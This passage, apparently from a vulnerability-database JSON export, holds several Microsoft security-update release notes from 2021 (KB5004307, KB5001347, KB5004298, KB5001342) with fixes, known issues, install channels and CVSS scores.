(known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include the following:\n\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5004233](<https://support.microsoft.com/help/5004233>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004307>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004307](<https://download.microsoft.com/download/4/2/0/4203a9dd-0925-47f8-a58e-27ede44ff81a/5004307.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004307 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33757", "CVE-2020-17049", "CVE-2021-34496"], "modified": "2021-07-13T07:00:00", "id": "KB5004307", "href": "https://support.microsoft.com/en-us/help/5004307", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:08:43", "description": "None\n**3/9/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Updates the default values for the following Internet Explorer registry keys:\n * svcKBFWLink = \u201c \u201d (string with one empty space)\n * svcKBNumber = \u201c \u201d (string with one empty space)\n * svcUpdateVersion = 11.0.1000.\nIn addition, these values will no longer be updated automatically. \n * Address an issue that causes a system to stop working occasionally when users sign out or disconnect from remote sessions.\n * Addresses an issue with a heap leak that might cause **explorer.exe** to consume high amounts of memory.\n * Updates the Volgograd, Russia time zone from UTC+4 to UTC+3.\n * Adds a new time zone, UTC+2:00 Juba, for the Republic of South Sudan.\n * Addresses a race condition that causes PowerShell to stop working periodically and generates an Access Violation error. This issue occurs when you enable transcription on the system and run multiple PowerShell scripts simultaneously.\n * Addresses an issue that causes the sleep time defined in HKLM\\Software\\Microsoft\\AppV\\MAV\\Configuration\\MaxAttachWaitTimeInMilliseconds to be shorter than intended.\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an issue with high memory usage when performing XSLT transforms using MSXLM6.\n * Addresses an issue in **spaceport.sys** that might cause stop error 0x7E.\n * Addresses an issue with evaluating the compatibility status of the Windows ecosystem to help ensure application and device compatibility for all updates to Windows.\n * Addresses an issue with security vulnerabilities identified by a security researcher. Because of these security vulnerabilities, this and all future Windows updates will no longer contain the [RemoteFX vGPU](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploy-graphics-devices-using-remotefx-vgpu>) feature. For more information about the vulnerability and its removal, see [CVE-2020-1036](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1036>) and [KB4570006](<https://support.microsoft.com/en-us/topic/update-to-disable-and-remove-the-remotefx-vgpu-component-in-windows-bbdf1531-7188-2bf4-0de6-641de79f09d2>). Secure vGPU alternatives are available using [Discrete Device Assignment (DDA)](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploying-graphics-devices-using-dda>) in Windows Server LTSC releases (Windows Server 2016 and Windows Server 2019) and Windows Server SAC releases (Windows Server, version 1803 and later versions).\n * Addresses an issue that prevents you from specifying up to 255 columns when you use the Jet Text installable indexed sequential access method (IISAM) format.\n * Addresses an issue that causes Windows Back up using File History to stop working for a few users. This issue occurs after installing the February 9, 2021 update. The error message is, \u201cFailed to start the backup of user links (error 8007005)\u201d.\n * Security updates to Windows Apps, Windows Input and Composition, Windows Office Media, Windows Fundamentals, Windows AI Platform, Windows Hybrid Cloud Networking, the Windows Kernel, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001402) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001347>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5001347](<https://download.microsoft.com/download/7/9/c/79cff94b-821b-4d24-ad68-5d2fb469aeb4/5001347.csv>). \n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-13T07:00:00", "type": "mskb", "title": "April 13, 2021\u2014KB5001347 (OS Build 14393.4350)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1036", "CVE-2020-17049", "CVE-2021-28318"], "modified": "2021-04-13T07:00:00", "id": "KB5001347", "href": "https://support.microsoft.com/en-us/help/5001347", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:19", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004954](<https://support.microsoft.com/help/5004954>) (released July 6, 2021) and addresses the following issues:\n\n * Addresses an issue in which 16-bit applications fail with an error message that states a general fault in VBRUN300.DLL.\n * Addresses an issue in which some EMFs built by using third-party applications that use **ExtCreatePen** and **ExtCreateFontIndirect** render incorrectly.\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049. ](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows Operating System Security, Windows Graphics, Microsoft Scripting Engine, Windows HTML Platforms, and Windows MSHTML Platform.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004298>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004298](<https://download.microsoft.com/download/3/2/6/32647c6d-2296-439e-8918-21be0f8cd42a/5004298.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004298 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-34459"], "modified": "2021-07-13T07:00:00", "id": "KB5004298", "href": "https://support.microsoft.com/en-us/help/5004298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:08:36", "description": "None\n**NEW 4/13/21 \nIMPORTANT **Windows 10, version 1809 will reach end of service on May 11, 2021 for devices running the Enterprise, Education, and IoT Enterprise editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise G, HoloLens, and the LTSC editions for Client, Server, and IoT.\n\n**2/16/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.1879) released April 13, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n\n## Improvements and fixes\n\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an issue with security vulnerabilities identified by a security researcher. Because of these security vulnerabilities, this and all future Windows updates will no longer contain the [RemoteFX vGPU](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploy-graphics-devices-using-remotefx-vgpu>) feature. For more information about the vulnerability and its removal, see [CVE-2020-1036](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1036>) and [KB4570006](<https://support.microsoft.com/en-us/topic/update-to-disable-and-remove-the-remotefx-vgpu-component-in-windows-bbdf1531-7188-2bf4-0de6-641de79f09d2>). Secure vGPU alternatives are available using [Discrete Device Assignment (DDA)](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploying-graphics-devices-using-dda>) in Windows Server LTSC releases (Windows Server 2016 and Windows Server 2019) and Windows Server SAC releases (Windows Server, version 1803 and later versions).\n * Addresses a potential elevation of privilege vulnerability in the way Azure Active Directory web sign-in allows arbitrary browsing from the third-party endpoints used for federated authentication. For more information, see [CVE-2021-27092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27092>) and [Policy CSP - Authentication](<https://docs.microsoft.com/en-us/windows/client-management/mdm/policy-csp-authentication#authentication-enablewebsignin>).\n * Addresses an issue that causes Windows Back up using File History to stop working for a few users. This issue occurs after installing the February 9, 2021 update. The error message is, \u201cFailed to start the backup of user links (error 8007005)\u201d.\n * Security updates to Windows App Platform and Frameworks, Windows Apps, Windows Input and Composition, Windows Office Media, Windows Fundamentals, Windows Cryptography, the Windows AI Platform, Windows Hybrid Cloud Networking, the Windows Kernel, Windows Virtualization, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001404) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001342>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5001342](<https://download.microsoft.com/download/4/c/2/4c2f5eb9-b102-4c92-a81a-90c58b1eb485/5001342.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mskb", "title": "April 13, 2021\u2014KB5001342 (OS Build 17763.1879)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1036", "CVE-2020-17049", "CVE-2021-27092", "CVE-2021-28318"], "modified": "2021-04-13T07:00:00", "id": "KB5001342", "href": "https://support.microsoft.com/en-us/help/5001342", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:14", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21 \nREMINDER **Windows 10, version 1809 reached end of service on May 11, 2021 for devices running the Enterprise, Education, and IoT Enterprise editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise G, HoloLens, and the LTSC editions for Client, Server, and IoT.\n\n**5/11/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in April 2021. In the May 11, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.2061) released July 13, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates for verifying usernames and passwords.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Removes support for the PerformTicketSignature setting and permanently enables Enforcement mode for CVE-2020-17049. For more information and steps to enable full protection on domain controller servers, see [Managing deployment of Kerberos S4U changes for CVE-2020-17049](<https://support.microsoft.com/en-us/topic/kb4598347-managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049-569d60b7-3267-e2b0-7d9b-e46d770332ab>). \n * Adds Advanced Encryption Standard (AES) encryption protections for 